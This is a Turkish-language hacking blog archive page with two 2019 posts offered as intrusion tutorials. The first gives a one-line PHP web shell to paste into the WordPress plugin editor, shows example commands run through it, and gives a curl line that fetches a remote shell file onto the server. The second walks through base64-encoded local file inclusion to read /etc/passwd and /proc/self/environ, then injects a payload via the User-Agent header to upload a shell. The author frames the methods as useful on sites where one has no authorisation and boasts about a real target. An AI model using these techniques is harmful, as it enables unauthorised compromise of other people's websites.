Newest Post

Archive for Temmuz 2019

Readmore
merhaba arkadaşlar bugün benim bildiğim sizlerin %99 bilmediği bir yol ile wordpress sistemlerde
komut çalıştırmayı anlatacağım konuyu yabancı bir kayaktan çevirdim
bu şekilde yetki olmayan sitelerde belki işinize yarar

şimdi wordpress yönetici panelinden

pluging>editör


izliyoruz

şimdi herhangi bir pluging seçin 

url şu şekilde oldu

/wp-admin/plugin-editor.php?file=akismet/index.php


şimdi editleyeceğiz


şimdi size vereceğim kodu yapıştırıyorsunuz


Önemli

<pre><?php system($_GET['x'])?></pre>


şimdi

öreksitecom/wp-content/plugins/akismet/?x=

bu şekilde konsol çalıştırabilirsiniz
burdan shellde yükleyebilirsiniz
genelde nginx serverlerde çalışan bi yöntemdir


örnek 

öreksitecom/wp-content/plugins/akismet/?x=dir ​


yaptığınız gibi size içerdekileri gösterir



gördüğünüz gibi gayet pratik bir yöntem

curl shellyüküsitecom/shell.txt -o kartal.php şeklinde komut çalıştırdığınızda kartal.php isminde
shellyüküsitecom/shell.txt sitesindeki shellin yüklü olduğu bir dosya size verecektir​

Wordpress Sistemlerde Komut Çalıştırarak Shell upload

7 Temmuz 2019 Pazar
Add Comments
Tag :, Tag :, Tag :, Tag :, Tag :
Readmore
Merhaba arkadaşlar bugün sizlere 
base64 şeklinde lfı göstereceğim arkadaşlar bazı sitelerde lfı vardır ama işte normal komutlarla onları göremessiniz örnek 
asite/page=/etc/passwd şeklinde göremessinizde asite/page=L2V0Yy9wYXNzd2Q= şeklinde yani base64lenmiş şeklinde denerseniz görürsünüz

şimdi hedef sistem bulduk lfı denemesi yapacağız


gördüğünüz gibi sitede işe yaramadı sade /etc/passwd
peki ne yapacağız hemen hackbarda /etc/passwd base64 çevireceğiz


evet çevirdik L2V0Yy9wYXNzd2Q= şimdi bunu deneyeceğiz 



gördüğünüz gibi okuduk arkadaşlar şimdi /proc/self/environ bakalım 
shell yüklemek için



şimdi base64 çeviriyoruz




gördüğünüz gibi okuduk



şimdi burp ile user agent kısmına payloadımızı yapıştırıyoruz

payload için tıkla

şimdi forward yapıyoruz payloadı yüklüyoruz şimdi

https://s7.dosya.tc/server14/qmx5ig/payload.txt.html




gördüğünüz gibi payload kartal.php base64 çevirdik şimdi shell yükleyelim


gördüğünüz gibi shell yükledik gördüğünüz gibi arkadaşlar sheldeki işlemlerde hata alırsanız base64 çevirmeniz yeterli


şunuda söylüyeyim arkadaşlar belki bu metotlarla çok ilgilenmiyorsunuz
ama şöyle birşey var bu deneme yaptığım sitenin alexa değeri globalde 105 bin Ayyıldız timin global alexsası 132 bin siz düşünün



alexa gördüğünüz gibi



Base64 Local File Inclusion

2 Temmuz 2019 Salı
Add Comments
Tag :, Tag :, Tag :, Tag :

// Copyright © WELCOME Se☪uЯity Candidate //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //